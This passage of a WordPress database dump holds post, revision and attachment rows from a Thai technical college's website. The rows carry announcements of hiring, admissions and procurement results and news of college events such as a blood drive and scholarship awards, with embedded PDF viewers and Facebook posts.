'2018-12-25 14:50:09', '2018-12-25 07:50:09', '', 4830, 'http://www.technicrayong.ac.th/4830-revision-v1/', 0, 'revision', '', 0),
(4838, 3, '2018-12-26 09:09:49', '2018-12-26 02:09:49', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%9C%E0%B9%88%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-1-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อบุคคลผู้ผ่านการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ตำแหน่งครูอัตราจ้าง จำนวน ๑ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9c', '', '', '2018-12-26 09:09:49', '2018-12-26 02:09:49', '', 0, 'http://www.technicrayong.ac.th/?p=4838', 200, 'post', '', 0),
(4839, 3, '2018-12-26 09:09:15', '2018-12-26 02:09:15', '', 'ประกาศ รายชื่อบุคคลผู้ผ่านการสอบคัดเลือก ครูอัตราจ้าง 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9c', '', '', '2018-12-26 09:09:15', '2018-12-26 02:09:15', '', 4838, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ประกาศ-รายชื่อบุคคลผู้ผ่านการสอบคัดเลือก-ครูอัตราจ้าง-1-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(4840, 3, '2018-12-26 09:09:49', '2018-12-26 02:09:49', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%9C%E0%B9%88%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-1-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อบุคคลผู้ผ่านการสอบคัดเลือกเป็นลูกจ้างชั่วคราว ตำแหน่งครูอัตราจ้าง จำนวน ๑ อัตรา', '', 'inherit', 'closed', 'closed', '', '4838-revision-v1', '', '', '2018-12-26 09:09:49', '2018-12-26 02:09:49', '', 4838, 'http://www.technicrayong.ac.th/4838-revision-v1/', 0, 'revision', '', 0),
(4842, 3, '2018-12-27 09:13:57', '2018-12-27 02:13:57', '', 'ประกาศ ผลการคัดเลือกโควตา ภายนอกedit.pdf', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b9%82%e0%b8%84-3', '', '', '2018-12-27 09:13:57', '2018-12-27 02:13:57', '', 4830, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ประกาศ-ผลการคัดเลือกโควตา-ภายนอกedit.pdf.pdf', 0, 'attachment', 'application/pdf', 0),
(4843, 3, '2018-12-27 09:14:10', '2018-12-27 02:14:10', '<a href=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\"><img class=\"aligncenter wp-image-4832 size-full\" src=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\" alt=\"\" width=\"1047\" height=\"815\" /></a>\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B8%99%E0%B8%AD%E0%B8%81edit.pdf.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักเรียน นักศึกษาโควตา (ภายนอก) หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4830-revision-v1', '', '', '2018-12-27 09:14:10', '2018-12-27 02:14:10', '', 4830, 'http://www.technicrayong.ac.th/4830-revision-v1/', 0, 'revision', '', 0),
(4852, 1, '2019-01-02 01:08:02', '2019-01-01 18:08:02', '<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span> English', 'en', '', 'inherit', 'closed', 'closed', '', '715-autosave-v1', '', '', '2019-01-02 01:08:02', '2019-01-01 18:08:02', '', 715, 'http://www.technicrayong.ac.th/715-autosave-v1/', 0, 'revision', '', 0),
(4860, 3, '2019-01-02 21:30:57', '2019-01-02 14:30:57', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%AA%E0%B8%99%E0%B8%AD%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2-%E0%B9%82%E0%B8%84%E0%B8%A3%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AB%E0%B9%89%E0%B8%AD%E0%B8%87%E0%B8%9B%E0%B8%8F%E0%B8%B4%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A5%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B9%96-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์การศึกษา โครงการห้องปฏิบัติการทางภาษาเคลื่อนที่ จำนวน ๖ รายการ โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-6', '', '', '2019-01-02 21:30:57', '2019-01-02 14:30:57', '', 0, 'http://www.technicrayong.ac.th/?p=4860', 198, 'post', '', 0),
(4861, 3, '2019-01-02 21:30:32', '2019-01-02 14:30:32', '', 'รายชื่อผู้ชนะการเสนอราคา โครงการห้องปฏิบัติการทางภาษาเคลื่อนที่ ๖ รายการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%aa%e0%b8%99%e0%b8%ad%e0%b8%a3%e0%b8%b2', '', '', '2019-01-02 21:30:32', '2019-01-02 14:30:32', '', 4860, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/รายชื่อผู้ชนะการเสนอราคา-โครงการห้องปฏิบัติการทางภาษาเคลื่อนที่-๖-รายการ.pdf', 0, 'attachment', 'application/pdf', 0),
(4862, 3, '2019-01-02 21:30:57', '2019-01-02 14:30:57', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%AA%E0%B8%99%E0%B8%AD%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2-%E0%B9%82%E0%B8%84%E0%B8%A3%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AB%E0%B9%89%E0%B8%AD%E0%B8%87%E0%B8%9B%E0%B8%8F%E0%B8%B4%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A5%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%99%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B9%96-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์การศึกษา โครงการห้องปฏิบัติการทางภาษาเคลื่อนที่ จำนวน ๖ รายการ โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4860-revision-v1', '', '', '2019-01-02 21:30:57', '2019-01-02 14:30:57', '', 4860, 'http://www.technicrayong.ac.th/4860-revision-v1/', 0, 'revision', '', 0),
(4863, 3, '2019-01-07 09:23:30', '2019-01-07 02:23:30', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D722760228100168%26id%3D100010985913485&width=500\" width=\"500\" height=\"819\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๑๑ ธันวาคม ๒๕๖๑ พิธีเปิดงาน “สุดยอดนวัตกรรมอาชีวศึกษา การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่” ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ที่จัดขึ้นระหว่างวันที่ ๙-๑๓ ธันวาคม ๒๕๖๑ โดยได้รับเกียรติจากท่าน ดร.ประชาคม จันทรชิต รองเลขาธิการคณะกรรมการการอาชีวศึกษา มาเป็นประธานในพิธีเปิด และ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง ประธานคณะกรรมการบริหารจัดการนวัตกรรมและเทคโนโลยี สิ่งประดิษฐ์อาชีวศึกษาระดับภาค ภาคตะวันออกและกรุงเทพมหานคร เป็นผู้กล่าวรายงานถึงวัตถุประสงค์ในการจัดงานในครั้งนี้ ณโรงแรมโกลเด้น ซิตี้ ระยอง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%91-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1', '', '', '2019-01-07 09:23:30', '2019-01-07 02:23:30', '', 0, 'http://www.technicrayong.ac.th/?p=4863', 197, 'post', '', 0),
(4864, 3, '2019-01-07 09:23:06', '2019-01-07 02:23:06', '', '47432787_722752978100893_5649355309756448768_o', '', 'inherit', 'closed', 'closed', '', '47432787_722752978100893_5649355309756448768_o', '', '', '2019-01-07 09:23:06', '2019-01-07 02:23:06', '', 4863, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/47432787_722752978100893_5649355309756448768_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4865, 3, '2019-01-07 09:23:30', '2019-01-07 02:23:30', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D722760228100168%26id%3D100010985913485&width=500\" width=\"500\" height=\"819\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๑๑ ธันวาคม ๒๕๖๑ พิธีเปิดงาน “สุดยอดนวัตกรรมอาชีวศึกษา การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่” ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ที่จัดขึ้นระหว่างวันที่ ๙-๑๓ ธันวาคม ๒๕๖๑ โดยได้รับเกียรติจากท่าน ดร.ประชาคม จันทรชิต รองเลขาธิการคณะกรรมการการอาชีวศึกษา มาเป็นประธานในพิธีเปิด และ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง ประธานคณะกรรมการบริหารจัดการนวัตกรรมและเทคโนโลยี สิ่งประดิษฐ์อาชีวศึกษาระดับภาค ภาคตะวันออกและกรุงเทพมหานคร เป็นผู้กล่าวรายงานถึงวัตถุประสงค์ในการจัดงานในครั้งนี้ ณโรงแรมโกลเด้น ซิตี้ ระยอง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '4863-revision-v1', '', '', '2019-01-07 09:23:30', '2019-01-07 02:23:30', '', 4863, 'http://www.technicrayong.ac.th/4863-revision-v1/', 0, 'revision', '', 0),
(4866, 3, '2019-01-07 09:30:05', '2019-01-07 02:30:05', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D722831868093004%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรม bike อุ่นไอรัก 2018 ภายใต้ภาระกิจ \"คลินิกจักรยาน\" เปิดให้บริการตรวจเช็คและซ่อมแซมรถจักรยาน ณ บริเวณสวนศรีเมือง อำเภอเมือง จังหวัดระยอง ซึ่งในงานมีนักปั่นเข้ารับบริการเป็นจำนวนมาก', '', 'publish', 'closed', 'open', '', '%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a8%e0%b8%b6%e0%b8%81', '', '', '2019-01-07 09:30:05', '2019-01-07 02:30:05', '', 0, 'http://www.technicrayong.ac.th/?p=4866', 196, 'post', '', 0),
(4867, 3, '2019-01-07 09:29:46', '2019-01-07 02:29:46', '', '47792602_722829534759904_1779651623589511168_o', '', 'inherit', 'closed', 'closed', '', '47792602_722829534759904_1779651623589511168_o', '', '', '2019-01-07 09:29:46', '2019-01-07 02:29:46', '', 4866, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/47792602_722829534759904_1779651623589511168_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4868, 3, '2019-01-07 09:30:05', '2019-01-07 02:30:05', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D722831868093004%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรม bike อุ่นไอรัก 2018 ภายใต้ภาระกิจ \"คลินิกจักรยาน\" เปิดให้บริการตรวจเช็คและซ่อมแซมรถจักรยาน ณ บริเวณสวนศรีเมือง อำเภอเมือง จังหวัดระยอง ซึ่งในงานมีนักปั่นเข้ารับบริการเป็นจำนวนมาก', '', 'inherit', 'closed', 'closed', '', '4866-revision-v1', '', '', '2019-01-07 09:30:05', '2019-01-07 02:30:05', '', 4866, 'http://www.technicrayong.ac.th/4866-revision-v1/', 0, 'revision', '', 0),
(4869, 3, '2019-01-07 09:37:34', '2019-01-07 02:37:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2085374208149439&width=500\" width=\"500\" height=\"662\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๑๒ ธันวาคม ๒๕๖๑ เวลา ๑๕.๓๐-๑๗.๓๐น. SCG Chemicals จัดกิจกรรมประชาสัมพันธ์บริษัทและรับสมัครงาน สำหรับนักศึกษาระดับ ปวส.๒ สาขาวิชาเทคนิคเครื่องกล เทคนิคการผลิต ไฟฟ้า อิเล็กทรอนิกส์ ปิโตรเคมี เคมีอุตสาหกรรม และเทคโนโลยียาง ณ ห้องประชุมสัมมนาอาขีวศึกษา วิทยาลัยเทคนิคระยอง โดยมีศิษย์เก่าสาขาวิชาเทคนิคการผลิต ไฟฟ้า และปิโตรเคมี มาให้คำแนะนำและเล่าประสบการณ์การทำงาน', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-%e0%b9%91%e0%b9%92-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1%e2%80%8b-%e0%b9%92', '', '', '2019-01-07 09:37:34', '2019-01-07 02:37:34', '', 0, 'http://www.technicrayong.ac.th/?p=4869', 195, 'post', '', 0),
(4870, 3, '2019-01-07 09:36:57', '2019-01-07 02:36:57', '', '48184523_2085373554816171_2386877565936599040_n', '', 'inherit', 'closed', 'closed', '', '48184523_2085373554816171_2386877565936599040_n', '', '', '2019-01-07 09:36:57', '2019-01-07 02:36:57', '', 4869, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48184523_2085373554816171_2386877565936599040_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4871, 3, '2019-01-07 09:37:34', '2019-01-07 02:37:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2085374208149439&width=500\" width=\"500\" height=\"662\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๑๒ ธันวาคม ๒๕๖๑ เวลา ๑๕.๓๐-๑๗.๓๐น. SCG Chemicals จัดกิจกรรมประชาสัมพันธ์บริษัทและรับสมัครงาน สำหรับนักศึกษาระดับ ปวส.๒ สาขาวิชาเทคนิคเครื่องกล เทคนิคการผลิต ไฟฟ้า อิเล็กทรอนิกส์ ปิโตรเคมี เคมีอุตสาหกรรม และเทคโนโลยียาง ณ ห้องประชุมสัมมนาอาขีวศึกษา วิทยาลัยเทคนิคระยอง โดยมีศิษย์เก่าสาขาวิชาเทคนิคการผลิต ไฟฟ้า และปิโตรเคมี มาให้คำแนะนำและเล่าประสบการณ์การทำงาน', '', 'inherit', 'closed', 'closed', '', '4869-revision-v1', '', '', '2019-01-07 09:37:34', '2019-01-07 02:37:34', '', 4869, 'http://www.technicrayong.ac.th/4869-revision-v1/', 0, 'revision', '', 0),
(4872, 3, '2019-01-07 09:54:04', '2019-01-07 02:54:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.724164797959711%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๑๓ ธันวาคม ๒๕๖๑ คณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง ร่วมบริจาคโลหิตให้แก่เหล่ากาชาดจังหวัดระยอง ภายใต้โครงการบริจาคโลหิตเพื่อถวายเป็นพระราชกุศล ณ ลานหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%93-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84', '', '', '2019-01-07 09:54:04', '2019-01-07 02:54:04', '', 0, 'http://www.technicrayong.ac.th/?p=4872', 194, 'post', '', 0),
(4873, 3, '2019-01-07 09:53:33', '2019-01-07 02:53:33', '', '48281739_724167731292751_3277769648459743232_o', '', 'inherit', 'closed', 'closed', '', '48281739_724167731292751_3277769648459743232_o', '', '', '2019-01-07 09:53:33', '2019-01-07 02:53:33', '', 4872, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48281739_724167731292751_3277769648459743232_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4874, 3, '2019-01-07 09:54:04', '2019-01-07 02:54:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.724164797959711%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๑๓ ธันวาคม ๒๕๖๑ คณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง ร่วมบริจาคโลหิตให้แก่เหล่ากาชาดจังหวัดระยอง ภายใต้โครงการบริจาคโลหิตเพื่อถวายเป็นพระราชกุศล ณ ลานหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4872-revision-v1', '', '', '2019-01-07 09:54:04', '2019-01-07 02:54:04', '', 4872, 'http://www.technicrayong.ac.th/4872-revision-v1/', 0, 'revision', '', 0),
(4875, 3, '2019-01-07 09:58:25', '2019-01-07 02:58:25', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2087828924570634&width=500\" width=\"500\" height=\"821\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ ที่ ๑๔ ธันวาคม ๒๕๖๑ บริษัท ไออาร์พีซี จำกัด(มหาชน) จัดพิธีมอบทุนการศึกษาเพื่อชุมชน ประจำปีการศึกษา ๒๕๖๑ ณ อาคารคณะผู้บริหารแผนฟื้นฟูกิจการ (IRPC Sport Complex) โดยมี นายธีรวัฒน์ สุดสุข รองผู้ว่าราชการจังหวัดระยอง ให้เกียรติเป็นประธานในพิธีเปิด และมี นายวรวุธ ปิ่นเงิน รองนายก อบจ.ระยอง นายสุพจน์ ต่ออาจเจริญ นายอำเภอเมืองระยอง นายวารินทร์ ดุษฏีวงษ์กำจร รองนายกเทศมนตรีนครระยอง นายพงศ์ประพันธ์ ฐิตทวีวัฒน์ รองกรรมการผู้จัดการใหญ่ กลุ่มธุรกิจปิโตรเคมีและการกลั่น บริษัท ไออาร์พีซี จำกัด (มหาชน) ผู้บริหารสถานศึกษา คณะครู นักเรียน นักศึกษา และหน่วยงานที่เกี่ยวข้องเข้าร่วมงาน ซึ่งนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ได้รับทุนการศึกษาเพื่อชุมชน จำนวน ๓๗ ทุน รวมเป็นเงินทั้งสิ้น ๒๙๗,๐๐๐ บาท', '', 'publish', 'closed', 'open', '', '%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97%e2%80%8b%e0%b9%84%e0%b8%ad%e0%b8%ad%e0%b8%b2%e0%b8%a3%e0%b9%8c%e0%b8%9e%e0%b8%b5%e0%b8%8b%e0%b8%b5%e2%80%8b-%e0%b8%88%e0%b8%b3%e0%b8%81%e0%b8%b1', '', '', '2019-01-07 10:03:33', '2019-01-07 03:03:33', '', 0, 'http://www.technicrayong.ac.th/?p=4875', 193, 'post', '', 0),
(4877, 3, '2019-01-07 09:58:25', '2019-01-07 02:58:25', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2087799901240203&width=500\" width=\"500\" height=\"844\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัทไออาร์พีซี จำกัด (มหาชน) มอบทุนการศึกษาเพื่อชุมชน ประจำปีการศึกษา ๒๕๖๑ จำนวน ๓๗ ทุน แก่นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง รวมเป็นเงินทั้งสิ้น ๒๙๗,๐๐๐ บาท', '', 'inherit', 'closed', 'closed', '', '4875-revision-v1', '', '', '2019-01-07 09:58:25', '2019-01-07 02:58:25', '', 4875, 'http://www.technicrayong.ac.th/4875-revision-v1/', 0, 'revision', '', 0),
(4878, 3, '2019-01-07 10:02:39', '2019-01-07 03:02:39', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2087828924570634&width=500\" width=\"500\" height=\"821\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ ที่ ๑๔ ธันวาคม ๒๕๖๑ บริษัท ไออาร์พีซี จำกัด(มหาชน) จัดพิธีมอบทุนการศึกษาเพื่อชุมชน ประจำปีการศึกษา ๒๕๖๑ ณ อาคารคณะผู้บริหารแผนฟื้นฟูกิจการ (IRPC Sport Complex) โดยมี นายธีรวัฒน์ สุดสุข รองผู้ว่าราชการจังหวัดระยอง ให้เกียรติเป็นประธานในพิธีเปิด และมี นายวรวุธ ปิ่นเงิน รองนายก อบจ.ระยอง นายสุพจน์ ต่ออาจเจริญ นายอำเภอเมืองระยอง นายวารินทร์ ดุษฏีวงษ์กำจร รองนายกเทศมนตรีนครระยอง นายพงศ์ประพันธ์ ฐิตทวีวัฒน์ รองกรรมการผู้จัดการใหญ่ กลุ่มธุรกิจปิโตรเคมีและการกลั่น บริษัท 